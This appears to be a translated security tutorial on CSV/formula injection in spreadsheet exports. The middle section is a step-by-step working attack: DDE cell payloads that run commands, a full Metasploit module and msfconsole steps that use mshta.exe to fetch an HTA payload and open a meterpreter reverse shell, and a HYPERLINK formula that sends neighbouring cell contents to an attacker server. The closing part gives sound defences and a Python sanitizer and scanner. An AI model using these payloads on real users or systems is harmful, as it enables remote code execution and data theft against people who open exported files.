Vulnerability introduction
CSV injection (also called formula injection) vulnerabilities usually appear in websites that offer a file export function (.csv/.xls). When the content of the exported file is user-controllable, an attacker injects a malicious payload (a formula) into an input field. After a user exports and opens the file, Excel evaluates the formula using its own dynamic features and runs the attacker's code, which can give the attacker control of the user's computer.
Vulnerability principle
Create an xls file and enter =1+1 in a cell.
After pressing Enter, the value changes to 2, showing that the plus sign was evaluated as an operation.
Of course, it is not only + that triggers a calculation: symbols such as =, - and @ at the start of a cell are also parsed as formulas by Excel.
DDE (Dynamic Data Exchange)
DDE is an inter-process communication protocol on Windows, a dynamic data exchange mechanism. DDE communication involves two Windows applications: one acts as the server that processes information, the other as the client that obtains information from the server. DDE is supported by Microsoft Excel, LibreOffice and Apache OpenOffice, and Excel, Word, RTF and Outlook can all use it to update content with the results of an external application. Therefore, if we craft a CSV file containing a DDE formula, Excel will try to launch an external application when the file is opened.
Invoking DDE requires it to be enabled under: File -> Options -> Trust Center -> Trust Center Settings -> External Content
By default, "Enable dynamic data exchange server launch (not recommended)" is unchecked, which prevents DDE from starting external applications. Older versions such as Office 2016 MSO (16.0.4266.1001) do not have this option, so execution of external programs cannot be prohibited there.
Vulnerability demonstration
Type =1*cmd|' /C calc'!A0 in a cell
and two pop-up windows will appear.
If the user clicks "Yes" without paying attention, a system command is executed at that point and the calculator pops up.
Exploit
Visit a malicious website (phishing)
=HYPERLINK("http://baidu.com","还记得我吗老baby?我想你了!!!")
When the user clicks the link, the system launches the browser to visit this website.
This is somewhat limited, since it requires the victim to click the link manually. But this formula does not trigger a warning.
Of course, it can also be combined with IE browser vulnerabilities, Flash vulnerabilities and the like to obtain a shell.
Reverse shell
Attack machine: Kali
Target machine: Windows 10
Without building a vulnerable web page template, we can create the Excel file directly and run it on the target machine.
Kali operation:
Save the following Ruby code as the file /usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      'License'       => MSF_LICENSE,
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'Targets'       => [['Automatic', {}]],
      'DefaultTarget' => 0
    ))
  end

  # Serve the HTA-wrapped payload when the URI is requested
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  # Print the command that is placed in the document
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end
Start the PostgreSQL database:
service postgresql start
Start msf:
msfconsole
msfconsole operation:
# Reload all modules so the new msh_shell module is picked up
reload_all
# Search for the newly created msh_shell module
search msh_shell
# Load the msh_shell module
use exploit/windows/smb/msh_shell
# Set the listener payload, IP address and URI path
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set uripath csv
exploit
Create a new Excel table and insert the following payload into the cell:
+1+cmd|'/c mshta.exe http://192.168.206.128:8080/csv'!A0
Upload it to the Windows 10 machine and open it. When the user clicks "Yes" without looking, the target machine comes online and MSF obtains a shell:
sessions -l
sessions -i 1
shell
Stealing the contents of other cells
The attacker enables web access logging:
Taking the Tomcat log as an example, edit the server.xml file under conf, uncomment the relevant configuration, and inject the following payload into Excel:
=HYPERLINK("http://192.168.206.130:8080/"&D2&D3,"Error: Please click me!")
When a user clicks the cell content by mistake after exporting the report, the contents of cells D2 and D3 are leaked to the attacker's server.
View the Tomcat web log:
Real-world vulnerability reproduction
CVE-2018-10504
CVE-2019-15092
Defensive measures
This type of attack is difficult to mitigate, and it is explicitly excluded from many bug bounty programs. To fix it, make sure that no cell starts with any of the following characters:
Equals sign ("=")
Plus sign ("+")
Minus sign ("-")
At sign ("@")
Developers can prefix cells containing such characters with an apostrophe ('). The apostrophe tells Excel that the cell does not contain a formula, and when the file is viewed in MS Excel, an apostrophe entered as the first character of a cell is not displayed.
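As an added example (not code from the original post), the following Python implements the defence above for a CSV export endpoint and also doubles as a check for the formula prefixes described in the "Vulnerability principle" section: every string cell that would be parsed as a formula gets the apostrophe prefix, and a scanner reports risky cells in CSV text that was produced elsewhere. The "=", "+", "-" and "@" prefixes are the ones listed above; tab and carriage return are added from OWASP's CSV injection guidance. The sample rows and the example.invalid host are constructed for this example.

```python
import csv
import io
import re

# Leading characters that Excel, LibreOffice and OpenOffice interpret as the
# start of a formula. '=', '+', '-' and '@' are the ones the post lists; tab
# and carriage return are added from OWASP's CSV injection guidance.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

# A plain signed number such as "-5" or "+3.25" is a value, not a formula,
# so it is deliberately not flagged (avoids corrupting numeric columns).
_PLAIN_NUMBER = re.compile(r"^[-+]?\d+(\.\d+)?$")


def is_formula_cell(value):
    """True if a string cell would be evaluated as a formula when opened.

    Leading spaces are ignored so that " =1+1" is also caught (conservative).
    Non-string values (numbers exported as numbers) are never formulas.
    """
    if not isinstance(value, str):
        return False
    stripped = value.lstrip(" ")
    if _PLAIN_NUMBER.match(stripped):
        return False
    return stripped.startswith(FORMULA_PREFIXES)


def sanitize_cell(value):
    """Neutralise a cell for export using the apostrophe prefix the post recommends.

    Excel treats a cell starting with an apostrophe as literal text and hides
    the apostrophe. Field quoting (so a payload cannot break out of its field
    with an embedded double quote) is left to csv.writer below.
    """
    if is_formula_cell(value):
        return "'" + value
    return value


def export_csv(rows, sanitize=True):
    """Serialise rows to CSV text; with sanitize=True every cell is neutralised.

    QUOTE_ALL quotes every field, so embedded commas, quotes and newlines in
    user input cannot start a new field or record.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(c) if sanitize else c for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Scan existing CSV text and return (row, col, value) for risky cells.

    Useful as a check on reports produced by code you do not control, or as a
    regression test on your own export endpoint.
    """
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, c, cell))
    return hits


# Constructed sample export: a user-supplied "comment" column containing the
# two formula shapes discussed in the post (a DDE-style command and a
# HYPERLINK that leaks neighbouring cells to a hypothetical host).
SAMPLE_ROWS = [
    ["username", "balance", "comment"],
    ["alice", 120, "thanks for the quick refund"],
    ["bob", -5, "=1*cmd|' /C calc'!A0"],
    ["carol", 0, '=HYPERLINK("http://example.invalid/"&D2&D3,"Error: Please click me!")'],
    ["dave", 7, "  -not a formula to a human, but Excel sees a leading dash"],
]


if __name__ == "__main__":
    print("risky cells in raw export:",
          find_formula_cells(export_csv(SAMPLE_ROWS, sanitize=False)))
    safe = export_csv(SAMPLE_ROWS)
    print("risky cells in sanitised export:", find_formula_cells(safe))
    print(safe)
```

Numeric columns should be exported as numbers (int or float), as in the sample; the sanitizer passes them through untouched, so a negative balance never acquires an apostrophe, while a free-text field that happens to begin with a dash does. Running find_formula_cells over your own export in a test is the quickest way to catch a new endpoint that forgot to call sanitize_cell.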